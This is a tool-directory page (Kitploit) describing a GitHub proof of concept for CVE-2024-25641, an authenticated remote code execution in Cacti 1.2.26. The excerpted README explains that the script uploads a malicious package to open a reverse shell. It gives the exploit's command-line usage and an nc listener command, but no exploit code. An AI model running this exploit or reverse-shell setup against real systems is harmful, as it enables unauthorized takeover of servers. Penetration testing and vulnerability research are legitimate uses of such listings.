Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-25641 — PoC for CVE-2024-25641 Authenticated RCE on Cacti v1.2.26 | Kitploit
Tools/GitHubGitHub/safarchand/cve-2024-25641
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubsafarchand/cve-2024-25641

CVE-2024-25641

PoC for CVE-2024-25641 Authenticated RCE on Cacti v1.2.26

View Repository
22302 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Cacti CVE-2024-25641 Authenticated Package Upload RCE Proof of Concept (PoC)

This script is a Proof of Concept (PoC) for exploiting the CVE-2024-25641 vulnerability in Cacti, a web-based monitoring tool. The script automates the process of authenticating with the application, uploading a malicious package, and triggering a reverse shell.

Requirements

  • Python 3.x
  • requests library
  • argparse library
  • re library

You can install the required Python library using pip3:

pip3 install requests
pip3 install argparse
pip3 install re

Usage

(make sure to place the test.xml.gz in the same directory as the exploit.py)

python3 exploit.py --url <TARGET_URL> -u <USERNAME> -p <PASSWORD> -i <LOCAL_IP> -l <PORT> [--proxy]

Start nc listener

nc -nvlp <port>
Download Tool